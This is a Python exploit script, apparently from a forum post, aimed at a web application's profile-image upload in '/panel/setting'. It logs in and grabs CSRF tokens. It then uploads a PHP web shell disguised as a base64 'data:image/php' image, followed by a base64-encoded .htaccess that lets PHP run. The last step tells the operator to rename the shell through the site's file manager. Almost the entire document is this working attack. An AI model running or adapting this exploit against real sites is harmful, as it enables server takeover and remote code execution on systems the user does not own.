Код:
import time
import requests
import base64
import re
import traceback
class Rocket:
def __init__(self,ssl,host,port,email,password,file):
self._url_to_upload = "/panel/setting"
self._url_to_login = "/login"
self.host = host
self.port = port
self.ssl = ssl
self.email = email
self.password = password
self.file = file
def get_csrf_token(self,client,URL):
fromt = client.get(URL)
if 'XSRF-TOKEN' in client.cookies:
csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0]
return csrftoken
else:
print("Error while fetching token")
return
def login(self):
client = requests.session()
if self.ssl == True:
ssl= "https://"
else:
ssl= "http://"
URL = str(ssl+self.host+":"+self.port+self._url_to_login)
URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload)
csrftoken = self.get_csrf_token(client,URL)
fromt = client.get(URL) # sets cookie
login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel')
r = client.post(URL, data=login_data, cookies=client.cookies)
self.upload_shell(client,URL2)
self.upload_htaccess(client,URL2)
def upload_shell(self,client,URL):
csrftoken = self.get_csrf_token(client,URL)
with open(self.file,"r") as payload:
to_base64 = payload.read()
to_base64 = str(to_base64).encode("utf-8")
base64_encoded_data= base64.b64encode(to_base64)
base64_encoded_data = str(base64_encoded_data)[:-1]
base64_encoded_data = str(base64_encoded_data)[2:]
string = "data:image/php;base64,"+str(base64_encoded_data)
data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")
r = client.post(URL, data=data, cookies=client.cookies)
print(r.status_code)
if r.status_code == 200:
print("sent and uploaded shell :"+URL+"\n")
else:
print("couldn't upload shell")
def upload_htaccess(self,client,URL):
csrftoken = self.get_csrf_token(client,URL)
string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4="
data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")
r = client.post(URL, data=data, cookies=client.cookies)
print(r.status_code)
if r.status_code == 200:
print("sent and uploaded htaccess:"+URL+"\n")
print("Go and rename file in filemanager on website")
else:
print("couldn't upload htaccess")
elon = Rocket(True,"localhost","443","student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")
elon.login()